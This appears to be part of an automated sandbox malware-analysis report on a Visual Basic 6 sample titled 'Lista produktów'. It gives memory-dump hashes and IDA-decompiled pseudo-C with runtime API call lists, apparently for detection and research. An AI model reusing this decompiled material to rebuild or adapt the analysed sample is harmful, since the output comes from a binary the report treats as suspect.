                  • Instruction Fuzzy Hash: 072168326443166FEB367E248C967EE3B62FF87750F640105FD48260E1E3BD9481C661
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
                  • Instruction ID: 0ef76ab4ed2bcdf07a831812e9108315abc5032b0251afc9fc56c28be75d868b
                  • Opcode Fuzzy Hash: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
                  • Instruction Fuzzy Hash: 5E11DAB150E3E59FCB174B748CB52527FB0AF1B20070A44EBD4819F8A7E268281ED727
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp, Offset: 01D70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1d70000_Lista produkt#U00f3w.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7d9720079b849dba400cdbbf8af391647b1446028a555134c1ba22bcdff7311e
                  • Instruction ID: 0fdc3d706dfac99ed7395811a23027f69a0166b873db950055938545173783e1
                  • Opcode Fuzzy Hash: 7d9720079b849dba400cdbbf8af391647b1446028a555134c1ba22bcdff7311e
                  • Instruction Fuzzy Hash: A811C234744385EEEB246F68DC9ABE4B7A0FF04740F944115ED859B2D1E7B0E880CA11
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp, Offset: 01D70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1d70000_Lista produkt#U00f3w.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 840743c67f0bd0d27897af866c60fac6b062514697fcef8ec613a3bd75331dc4
                  • Instruction ID: fb452af6e357c16b789e1e037570ae66668ab0fba70182e94c94cd9c3ed66b79
                  • Opcode Fuzzy Hash: 840743c67f0bd0d27897af866c60fac6b062514697fcef8ec613a3bd75331dc4
                  • Instruction Fuzzy Hash: 0701A4B57803027EF7210A248D46FD57966BB81F44F318128FF083A1C4E3FA98495758
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
                  • Instruction ID: 3a4f40afd7daac755765d0dbc513794409bb1d663c47dbf88c845af7c1cdfe86
                  • Opcode Fuzzy Hash: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
                  • Instruction Fuzzy Hash: CBF07A70124154EFCB06CF74D8A5A063BE1AF5B3407451CDAD9108F475D736B865EB12
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp, Offset: 01D70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1d70000_Lista produkt#U00f3w.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9fa056a3f69428cb5e79cee73a04be43d8af45d6f3c72fa794b1767a239001c8
                  • Instruction ID: 9d7ba46cc3f50b089adaa773bbce3f07c315836417aa7fc75a3a543f73d1626b
                  • Opcode Fuzzy Hash: 9fa056a3f69428cb5e79cee73a04be43d8af45d6f3c72fa794b1767a239001c8
                  • Instruction Fuzzy Hash: 42F092303016428FD714DB1CC9D4F5673B5EF69310F458665E941C7276E334EC40CA60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp, Offset: 01D70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1d70000_Lista produkt#U00f3w.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
                  • Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
                  • Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
                  • Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp, Offset: 01D70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1d70000_Lista produkt#U00f3w.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                  • Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
                  • Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                  • Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 54%
                  			E00410619(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12, intOrPtr _a23) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				void* _v28;
                  				intOrPtr _v32;
                  				void* _v36;
                  				void* _v40;
                  				signed int _v44;
                  				char _v48;
                  				char _v52;
                  				char _v56;
                  				void* _v64;
                  				void* _v72;
                  				void* _v80;
                  				void* _v88;
                  				void* _v96;
                  				void* _v104;
                  				void* _v112;
                  				void* _v120;
                  				void* _v128;
                  				void* _v136;
                  				void* _v144;
                  				void* _v152;
                  				void* _v172;
                  				signed int _v176;
                  				intOrPtr* _v180;
                  				signed int _v184;
                  				intOrPtr* _v188;
                  				signed int _v192;
                  				signed int _v204;
                  				void* _v208;
                  				void* _v212;
                  				intOrPtr* _v216;
                  				signed int _v220;
                  				signed int _v224;
                  				intOrPtr* _v228;
                  				signed int _v232;
                  				intOrPtr* _v236;
                  				signed int _v240;
                  				signed int _v244;
                  				void* _v248;
                  				void* _v252;
                  				void* _v256;
                  				void* _v260;
                  				signed int _t174;
                  				short _t180;
                  				signed int _t186;
                  				signed int _t191;
                  				char* _t196;
                  				signed int _t200;
                  				signed int _t206;
                  				signed int _t210;
                  				intOrPtr _t258;
                  				void* _t273;
                  				void* _t275;
                  				intOrPtr _t276;
                  
                  				_t276 = _t275 - 0xc;
                  				 *[fs:0x0] = _t276;
                  				L004011F0();
                  				_v16 = _t276;
                  				_v12 = 0x4011a8;
                  				_v8 = 0;
                  				_t174 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4011f6, _t273);
                  				L0040136A();
                  				_push(1);
                  				_push(0x402fe0);
                  				_push(0x402fe0);
                  				L004013BE();
                  				L004013B2();
                  				_push(_t174);
                  				L004012C2();
                  				L004013B2();
                  				_push(_t174);
                  				_push(0x402fe0);
                  				L004012C8();
                  				asm("sbb eax, eax");
                  				_v172 =  ~( ~( ~_t174));
                  				_push( &_v48);
                  				_push( &_v44);
                  				_push(2);
                  				L0040131C();
                  				_t180 = _v172;
                  				if(_t180 != 0) {
                  					if( *0x4123c0 != 0) {
                  						_v216 = 0x4123c0;
                  					} else {
                  						_push(0x4123c0);
                  						_push(0x403004);
                  						L00401388();
                  						_v216 = 0x4123c0;
                  					}
                  					_v172 =  *_v216;
                  					_t186 =  *((intOrPtr*)( *_v172 + 0x14))(_v172,  &_v52);
                  					asm("fclex");
                  					_v176 = _t186;
                  					if(_v176 >= 0) {
                  						_v220 = _v220 & 0x00000000;
                  					} else {
                  						_push(0x14);
                  						_push(0x402ff4);
                  						_push(_v172);
                  						_push(_v176);
                  						L00401394();
                  						_v220 = _t186;
                  					}
                  					_v180 = _v52;
                  					_t191 =  *((intOrPtr*)( *_v180 + 0xe0))(_v180,  &_v44);
                  					asm("fclex");
                  					_v184 = _t191;
                  					if(_v184 >= 0) {
                  						_v224 = _v224 & 0x00000000;
                  					} else {
                  						_push(0xe0);
                  						_push(0x403014);
                  						_push(_v180);
                  						_push(_v184);
                  						L00401394();
                  						_v224 = _t191;
                  					}
                  					_v204 = _v44;
                  					_v44 = _v44 & 0x00000000;
                  					_t258 = _v204;
                  					L004013B2();
                  					L00401382();
                  					if( *0x412010 != 0) {
                  						_v228 = 0x412010;
                  					} else {
                  						_push("(RO");
                  						_push(0x40246c);
                  						L00401388();
                  						_v228 = 0x412010;
                  					}
                  					_t196 =  &_v52;
                  					L00401358();
                  					_v172 = _t196;
                  					_t200 =  *((intOrPtr*)( *_v172 + 0x48))(_v172,  &_v44, _t196,  *((intOrPtr*)( *((intOrPtr*)( *_v228)) + 0x30c))( *_v228));
                  					asm("fclex");
                  					_v176 = _t200;
                  					if(_v176 >= 0) {
                  						_v232 = _v232 & 0x00000000;
                  					} else {
                  						_push(0x48);
                  						_push(0x403168);
                  						_push(_v172);
                  						_push(_v176);
                  						L00401394();
                  						_v232 = _t200;
                  					}
                  					if( *0x4123c0 != 0) {
                  						_v236 = 0x4123c0;
                  					} else {
                  						_push(0x4123c0);
                  						_push(0x403004);
                  						L00401388();
                  						_v236 = 0x4123c0;
                  					}
                  					_v180 =  *_v236;
                  					_t206 =  *((intOrPtr*)( *_v180 + 0x14))(_v180,  &_v56);
                  					asm("fclex");
                  					_v184 = _t206;
                  					if(_v184 >= 0) {
                  						_v240 = _v240 & 0x00000000;
                  					} else {
                  						_push(0x14);
                  						_push(0x402ff4);
                  						_push(_v180);
                  						_push(_v184);
                  						L00401394();
                  						_v240 = _t206;
                  					}
                  					_v188 = _v56;
                  					_t210 =  *((intOrPtr*)( *_v188 + 0x138))(_v188, _v44, 1);
                  					asm("fclex");
                  					_v192 = _t210;
                  					if(_v192 >= 0) {
                  						_v244 = _v244 & 0x00000000;
                  					} else {
                  						_push(0x138);
                  						_push(0x403014);
                  						_push(_v188);
                  						_push(_v192);
                  						L00401394();
                  						_v244 = _t210;
                  					}
                  					L00401364();
                  					_push( &_v56);
                  					_push( &_v52);
                  					_push(2);
                  					L0040134C();
                  					asm("les ecx, [ebx+eax*4]");
                  					_a23 = _a23 + _t258;
                  				}
                  				_v32 = 0x485fa3;
                  				_push(0x410c0e);
                  				L00401364();
                  				L00401364();
                  				L00401382();
                  				return _t180;
                  			}



























































                  0x0041061c
                  0x0041062b
                  0x00410637
                  0x0041063f
                  0x00410642
                  0x00410649
                  0x00410658
                  0x00410661
                  0x00410666
                  0x00410668
                  0x0041066d
                  0x00410672
                  0x0041067c
                  0x00410681
                  0x00410682
                  0x0041068c
                  0x00410691
                  0x00410692
                  0x00410697
                  0x0041069e
                  0x004106a4
                  0x004106ae
                  0x004106b2
                  0x004106b3
                  0x004106b5
                  0x004106bd
                  0x004106c6
                  0x004106d3
                  0x004106f0
                  0x004106d5
                  0x004106d5
                  0x004106da
                  0x004106df
                  0x004106e4
                  0x004106e4
                  0x00410702
                  0x0041071a
                  0x0041071d
                  0x0041071f
                  0x0041072c
                  0x0041074e
                  0x0041072e
                  0x0041072e
                  0x00410730
                  0x00410735
                  0x0041073b
                  0x00410741
                  0x00410746
                  0x00410746
                  0x00410758
                  0x00410770
                  0x00410776
                  0x00410778
                  0x00410785
                  0x004107aa
                  0x00410787
                  0x00410787
                  0x0041078c
                  0x00410791
                  0x00410797
                  0x0041079d
                  0x004107a2
                  0x004107a2
                  0x004107b4
                  0x004107ba
                  0x004107be
                  0x004107c7
                  0x004107cf
                  0x004107db
                  0x004107f8
                  0x004107dd
                  0x004107dd
                  0x004107e2
                  0x004107e7
                  0x004107ec
                  0x004107ec
                  0x0041081c
                  0x00410820
                  0x00410825
                  0x0041083d
                  0x00410840
                  0x00410842
                  0x0041084f
                  0x00410871
                  0x00410851
                  0x00410851
                  0x00410853
                  0x00410858
                  0x0041085e
                  0x00410864
                  0x00410869
                  0x00410869
                  0x0041087f
                  0x0041089c
                  0x00410881
                  0x00410881
                  0x00410886
                  0x0041088b
                  0x00410890
                  0x00410890
                  0x004108ae
                  0x004108c6
                  0x004108c9
                  0x004108cb
                  0x004108d8
                  0x004108fa
                  0x004108da
                  0x004108da
                  0x004108dc
                  0x004108e1
                  0x004108e7
                  0x004108ed
                  0x004108f2
                  0x004108f2
                  0x00410904
                  0x0041091d
                  0x00410923
                  0x00410925
                  0x00410932
                  0x00410957
                  0x00410934
                  0x00410934
                  0x00410939
                  0x0041093e
                  0x00410944
                  0x0041094a
                  0x0041094f
                  0x0041094f
                  0x00410961
                  0x00410969
                  0x0041096d
                  0x0041096e
                  0x00410970
                  0x00410976
                  0x0041097e
                  0x0041097e
                  0x00410bb0
                  0x00410bb7
                  0x00410bf8
                  0x00410c00
                  0x00410c08
                  0x00410c0d

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004011F6), ref: 00410637
                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004011F6), ref: 00410661
                  • __vbaStrCat.MSVBVM60(00402FE0,00402FE0,00000001,?,?,?,?,004011F6), ref: 00410672
                  • __vbaStrMove.MSVBVM60(00402FE0,00402FE0,00000001,?,?,?,?,004011F6), ref: 0041067C
                  • #616.MSVBVM60(00000000,00402FE0,00402FE0,00000001,?,?,?,?,004011F6), ref: 00410682
                  • __vbaStrMove.MSVBVM60(00000000,00402FE0,00402FE0,00000001,?,?,?,?,004011F6), ref: 0041068C
                  • __vbaStrCmp.MSVBVM60(00402FE0,00000000,00000000,00402FE0,00402FE0,00000001,?,?,?,?,004011F6), ref: 00410697
                  • __vbaFreeStrList.MSVBVM60(00000002,00402FE0,00402FE0,00402FE0,00000000,00000000,00402FE0,00402FE0,00000001,?,?,?,?,004011F6), ref: 004106B5
                  • __vbaNew2.MSVBVM60(00403004,004123C0,?,?,004011F6), ref: 004106DF
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402FF4,00000014), ref: 00410741
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403014,000000E0), ref: 0041079D
                  • __vbaStrMove.MSVBVM60(00000000,?,00403014,000000E0), ref: 004107C7
                  • __vbaFreeObj.MSVBVM60(00000000,?,00403014,000000E0), ref: 004107CF
                  • __vbaNew2.MSVBVM60(0040246C,(RO), ref: 004107E7
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410820
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403168,00000048), ref: 00410864
                  • __vbaNew2.MSVBVM60(00403004,004123C0), ref: 0041088B
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402FF4,00000014), ref: 004108ED
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403014,00000138), ref: 0041094A
                  • __vbaFreeStr.MSVBVM60(00000000,?,00403014,00000138), ref: 00410961
                  • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00410970
                  • __vbaNew2.MSVBVM60(0040246C,(RO,?,?,?,?,?,004011F6), ref: 0041098B
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 004109C4
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403168,00000050), ref: 00410A08
                  • __vbaNew2.MSVBVM60(00403004,004123C0), ref: 00410A2F
                  • __vbaChkstk.MSVBVM60(?), ref: 00410ABD
                  • __vbaChkstk.MSVBVM60(?), ref: 00410AD1
                  • __vbaChkstk.MSVBVM60(?), ref: 00410AE5
                  • __vbaChkstk.MSVBVM60(?), ref: 00410AF6
                  • __vbaChkstk.MSVBVM60(?), ref: 00410B07
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402FF4,00000044), ref: 00410B4A
                  • __vbaChkstk.MSVBVM60(00000000,?,00402FF4,00000044), ref: 00410B7E
                  • __vbaLateIdSt.MSVBVM60(?,00000000), ref: 00410B91
                  • __vbaFreeObj.MSVBVM60(?,00000000), ref: 00410B99
                  • __vbaFreeVarList.MSVBVM60(00000002,00000008,00000009,?,00000000), ref: 00410BA8
                  • __vbaFreeStr.MSVBVM60(00410C0E), ref: 00410BF8
                  • __vbaFreeStr.MSVBVM60(00410C0E), ref: 00410C00
                  • __vbaFreeObj.MSVBVM60(00410C0E), ref: 00410C08
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: __vba$Free$CheckChkstkHresult$New2$ListMove$#616CopyLate
                  • String ID: (RO
                  • API String ID: 709077215-2817633693
                  • Opcode ID: 616164fadd98097fbc4bfed8f0a863bcc30ecb5f2947d3a91ddc1f49f9f9be98
                  • Instruction ID: 28d57b1b4e2b041cb69e3cba8c6e5e7c1691930446970aabda1e8d473d8c4b44
                  • Opcode Fuzzy Hash: 616164fadd98097fbc4bfed8f0a863bcc30ecb5f2947d3a91ddc1f49f9f9be98
                  • Instruction Fuzzy Hash: 25F14670900318EFDB20DFA1C945BDDBBB5BF09304F1040AAE909BB2A1D7B85AD49F59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __vbaNew2.MSVBVM60(0040246C,(RO,?,?,?,?,?,004011F6), ref: 0041098B
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 004109C4
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403168,00000050), ref: 00410A08
                  • __vbaNew2.MSVBVM60(00403004,004123C0), ref: 00410A2F
                  • __vbaChkstk.MSVBVM60(?), ref: 00410ABD
                  • __vbaChkstk.MSVBVM60(?), ref: 00410AD1
                  • __vbaChkstk.MSVBVM60(?), ref: 00410AE5
                  • __vbaChkstk.MSVBVM60(?), ref: 00410AF6
                  • __vbaChkstk.MSVBVM60(?), ref: 00410B07
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402FF4,00000044), ref: 00410B4A
                  • __vbaChkstk.MSVBVM60(00000000,?,00402FF4,00000044), ref: 00410B7E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: __vba$Chkstk$CheckHresultNew2
                  • String ID: (RO
                  • API String ID: 3535372409-2817633693
                  • Opcode ID: 5257360313e534e33858a43a1890e6df24cae7f9ad2a4105235e79355f173a39
                  • Instruction ID: 98c73b30c2f382c11d38a88712cfbaaea9eeadb122e3cc0462137c722bdf7083
                  • Opcode Fuzzy Hash: 5257360313e534e33858a43a1890e6df24cae7f9ad2a4105235e79355f173a39
                  • Instruction Fuzzy Hash: 60616D31900318DFDB21DFA1C945BDDBBB2BF09304F1044AAFA08BB292D7B95A859F55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 48%
                  			E0041107C(void* __eax) {
                  				intOrPtr _t51;
                  				void* _t53;
                  				short _t57;
                  				intOrPtr _t72;
                  				void* _t77;
                  				void* _t89;
                  				void* _t90;
                  
                  				L0:
                  				while(1) {
                  					L0:
                  					_t51 = _t89 - 0x24;
                  					_push(_t51);
                  					L0040128C();
                  					 *((intOrPtr*)(_t89 - 0x124)) = _t51;
                  					L2:
                  					if( *((intOrPtr*)(_t89 - 0x124)) != 0) {
                  						L1:
                  						 *((intOrPtr*)(_t89 - 0x80)) = 1;
                  						 *((intOrPtr*)(_t89 - 0x88)) = 2;
                  						_push(_t89 - 0x88);
                  						_t53 = _t89 - 0x24;
                  						_push(_t53);
                  						L00401346();
                  						_push(_t53);
                  						_push(_t89 - 0x74);
                  						_push(_t89 - 0x98);
                  						L00401292();
                  						_push(_t89 - 0x98);
                  						_t57 = _t89 - 0x78;
                  						_push(_t57);
                  						L00401298();
                  						_push(_t57);
                  						L0040129E();
                  						 *((short*)(_t89 - 0xa0)) = _t57;
                  						 *((intOrPtr*)(_t89 - 0xa8)) = 2;
                  						_push(_t89 - 0xa8);
                  						_push(_t89 - 0xb8);
                  						L004012A4();
                  						_push(_t89 - 0x34);
                  						_push(_t89 - 0xb8);
                  						_push(_t89 - 0xc8);
                  						L0040133A();
                  						L00401340();
                  						L00401364();
                  						_push(_t89 - 0xb8);
                  						_push(_t89 - 0xa8);
                  						_push(_t89 - 0x98);
                  						_push(_t89 - 0x88);
                  						_push(4);
                  						L004013B8();
                  						_t90 = _t90 + 0x14;
                  						_push(_t89 - 0x118);
                  						continue;
                  					}
                  					L3:
                  					 *((intOrPtr*)(_t89 - 0x90)) = 0x80020004;
                  					 *((intOrPtr*)(_t89 - 0x98)) = 0xa;
                  					 *((intOrPtr*)(_t89 - 0xd0)) = 0x403228;
                  					 *((intOrPtr*)(_t89 - 0xd8)) = 8;
                  					_push(1);
                  					_push(1);
                  					_push(_t89 - 0x98);
                  					_push(_t89 - 0xd8);
                  					_push(_t89 - 0x34);
                  					_t72 = _t89 - 0x88;
                  					_push(_t72);
                  					L0040133A();
                  					_push(_t72);
                  					L00401286();
                  					 *((intOrPtr*)(_t89 - 0xa0)) = _t72;
                  					 *((intOrPtr*)(_t89 - 0xa8)) = 8;
                  					L00401340();
                  					_push(_t89 - 0x98);
                  					_push(_t89 - 0x88);
                  					_push(2);
                  					L004013B8();
                  					L4:
                  					_push(0x4111ac);
                  					L5:
                  					_push(_t89 - 0x118);
                  					_push(_t89 - 0x108);
                  					_t77 = _t89 - 0xf8;
                  					_push(_t77);
                  					_push(3);
                  					L004013B8();
                  					L004013A6();
                  					L004013A6();
                  					L004013A6();
                  					L004013A6();
                  					L004013A6();
                  					L004013A6();
                  					return _t77;
                  					L6:
                  				}
                  			}










                  0x0041107c
                  0x0041107c
                  0x0041107c
                  0x0041107d
                  0x00411080
                  0x00411081
                  0x00411086
                  0x0041108c
                  0x00411093
                  0x00410fb4
                  0x00410fb4
                  0x00410fbb
                  0x00410fcb
                  0x00410fcc
                  0x00410fcf
                  0x00410fd0
                  0x00410fd5
                  0x00410fd9
                  0x00410fe0
                  0x00410fe1
                  0x00410fec
                  0x00410fed
                  0x00410ff0
                  0x00410ff1
                  0x00410ff6
                  0x00410ff7
                  0x00410ffc
                  0x00411003
                  0x00411013
                  0x0041101a
                  0x0041101b
                  0x00411023
                  0x0041102a
                  0x00411031
                  0x00411032
                  0x0041103c
                  0x00411044
                  0x0041104f
                  0x00411056
                  0x0041105d
                  0x00411064
                  0x00411065
                  0x00411067
                  0x0041106c
                  0x00411075
                  0x00000000
                  0x00411076
                  0x00411099
                  0x00411099
                  0x004110a3
                  0x004110ad
                  0x004110b7
                  0x004110c1
                  0x004110c3
                  0x004110cb
                  0x004110d2
                  0x004110d6
                  0x004110d7
                  0x004110dd
                  0x004110de
                  0x004110e3
                  0x004110e4
                  0x004110e9
                  0x004110ef
                  0x00411102
                  0x0041110d
                  0x00411114
                  0x00411115
                  0x00411117
                  0x0041111f
                  0x0041111f
                  0x0041115c
                  0x00411162
                  0x00411169
                  0x0041116a
                  0x00411170
                  0x00411171
                  0x00411173
                  0x0041117e
                  0x00411186
                  0x0041118e
                  0x00411196
                  0x0041119e
                  0x004111a6
                  0x004111ab
                  0x00000000
                  0x004111ab

                  APIs
                  • __vbaI4Var.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000002), ref: 00410FD0
                  • #632.MSVBVM60(?,?,00000000,?,00000002,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410FE1
                  • __vbaStrVarVal.MSVBVM60(?,?,?,?,00000000,?,00000002,?,?,?,?,?,?,?,?,?), ref: 00410FF1
                  • #516.MSVBVM60(00000000,?,?,?,?,00000000,?,00000002,?,?,?,?,?,?,?,?), ref: 00410FF7
                  • #573.MSVBVM60(?,00000002,00000000,?,?,?,?,00000000,?,00000002), ref: 0041101B
                  • __vbaVarAdd.MSVBVM60(?,?,?,?,00000002,00000000,?,?,?,?,00000000,?,00000002), ref: 00411032
                  • __vbaVarMove.MSVBVM60(?,?,?,?,00000002,00000000,?,?,?,?,00000000,?,00000002), ref: 0041103C
                  • __vbaFreeStr.MSVBVM60(?,?,?,?,00000002,00000000,?,?,?,?,00000000,?,00000002), ref: 00411044
                  • __vbaFreeVarList.MSVBVM60(00000004,00000002,?,00000002,?,?,?,?,?,00000002,00000000,?,?,?,?,00000000), ref: 00411067
                  • __vbaVarForNext.MSVBVM60(?,?,?,?,?,?,?,004011F6), ref: 00411081
                  • __vbaVarAdd.MSVBVM60(?,?,00000008,0000000A,00000001,00000001), ref: 004110DE
                  • #650.MSVBVM60(00000000,?,?,00000008,0000000A,00000001,00000001), ref: 004110E4
                  • __vbaVarMove.MSVBVM60(00000000,?,?,00000008,0000000A,00000001,00000001), ref: 00411102
                  • __vbaFreeVarList.MSVBVM60(00000002,?,0000000A,00000000,?,?,00000008,0000000A,00000001,00000001), ref: 00411117
                  • __vbaFreeVarList.MSVBVM60(00000003,?,?,?,004111AC,?,?,?,?,?,?,?,?,004011F6), ref: 00411173
                  • __vbaFreeVar.MSVBVM60(?,?,?,004011F6), ref: 0041117E
                  • __vbaFreeVar.MSVBVM60(?,?,?,004011F6), ref: 00411186
                  • __vbaFreeVar.MSVBVM60(?,?,?,004011F6), ref: 0041118E
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: __vba$Free$List$Move$#516#573#632#650Next
                  • String ID:
                  • API String ID: 1850725036-0
                  • Opcode ID: 4cd3c86d69642dcd301a213dfd13ac64d2e7440048f37005a743a34362f7c2c1
                  • Instruction ID: 9228b074edff6c7148bfddd31f03498038a44a97c51c4c87e5559b8c814fbbe8
                  • Opcode Fuzzy Hash: 4cd3c86d69642dcd301a213dfd13ac64d2e7440048f37005a743a34362f7c2c1
                  • Instruction Fuzzy Hash: 36419DB2C0021CAADB51EB91CC86FDEB37CAB14304F5041EBA549F2191EF786B898F55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 58%
                  			E00410C35(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				short _v24;
                  				void* _v28;
                  				void* _v32;
                  				signed int _v36;
                  				char _v40;
                  				void* _v44;
                  				intOrPtr* _v48;
                  				signed int _v52;
                  				intOrPtr* _v56;
                  				signed int _v60;
                  				signed int _v68;
                  				intOrPtr* _v72;
                  				signed int _v76;
                  				signed int _v80;
                  				intOrPtr* _v84;
                  				signed int _v88;
                  				signed int _t70;
                  				signed int _t75;
                  				char* _t80;
                  				signed int _t84;
                  				short _t85;
                  				intOrPtr _t103;
                  
                  				_push(0x4011f6);
                  				_push( *[fs:0x0]);
                  				 *[fs:0x0] = _t103;
                  				_push(0x44);
                  				L004011F0();
                  				_v12 = _t103;
                  				_v8 = 0x4011b8;
                  				L0040136A();
                  				if( *0x4123c0 != 0) {
                  					_v72 = 0x4123c0;
                  				} else {
                  					_push(0x4123c0);
                  					_push(0x403004);
                  					L00401388();
                  					_v72 = 0x4123c0;
                  				}
                  				_v48 =  *_v72;
                  				_t70 =  *((intOrPtr*)( *_v48 + 0x14))(_v48,  &_v40);
                  				asm("fclex");
                  				_v52 = _t70;
                  				if(_v52 >= 0) {
